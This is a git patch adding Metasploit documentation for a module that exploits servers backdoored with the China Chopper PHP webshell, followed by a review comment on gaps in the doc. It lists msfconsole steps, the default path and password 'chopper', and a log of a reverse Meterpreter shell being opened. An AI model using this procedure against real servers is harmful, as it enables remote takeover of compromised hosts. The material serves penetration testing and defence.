From 51a2354fea69760a1f43f7867cfc86f1b2b06e2b Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Sat, 20 Aug 2016 04:12:31 +0800 Subject: [PATCH] Add KB for multi/http/caidao_php_backdoor_exec --- .../multi/http/caidao_php_backdoor_exec.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md diff --git a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md new file mode 100644 index 0000000000..36949fd35e --- /dev/null +++ b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md @@ -0,0 +1,49 @@ +China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP. + +## Vulnerable Application + +Here is the PHP code of the backdoor that you can use and save it as caidao.php: + +``` + +``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[+] 192.168.1.103:80 - The target is vulnerable. +``` + 8. Do: `exploit` + 9. You should get a shell. + +## Options + + **TARGETURI** + + TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor. + + **PASSWORD** + + PASSWORD by default is `chopper`, which is the password of the backdoor. + +## Demonstration + +``` +msf exploit(caidao_php_backdoor_exec) > exploit + +[*] Started reverse handler on 192.168.1.108:4444 +[*] Sending stage (33068 bytes) to 192.168.1.103 +[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000 + +meterpreter > sysinfo +Computer : kali +OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 +Meterpreter : php/php + +```
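Review bot: the fenced block under "## Vulnerable Application" is empty in this hunk, so the sentence "Here is the PHP code of the backdoor that you can use and save it as caidao.php:" points at nothing and step 1 ("Install the application") cannot be followed; either the snippet was dropped from the file or it was never added, so please put the intended PHP contents inside the fence or otherwise describe what the test file must contain. Two smaller points in the "## Verification Steps" list: steps 4 and 5 read `set rport ` and `set rhost ` with nothing after the option name, so the placeholder values the reader is meant to substitute are missing and should be spelled out; and the numbering jumps from `6. Do: \`check\`` to `8. Do: \`exploit\`` with the unindented `[+] 192.168.1.103:80 - The target is vulnerable.` fence in between, which breaks the numbered list in rendered markdown, so either renumber to 7 or indent the output fence under step 6 so the list continues. Last, the "## Demonstration" transcript is dated `2015-11-02` against an August 2016 commit and does not show the `check` run or the options being set, so a fresh session captured with the steps above would make the doc self-consistent.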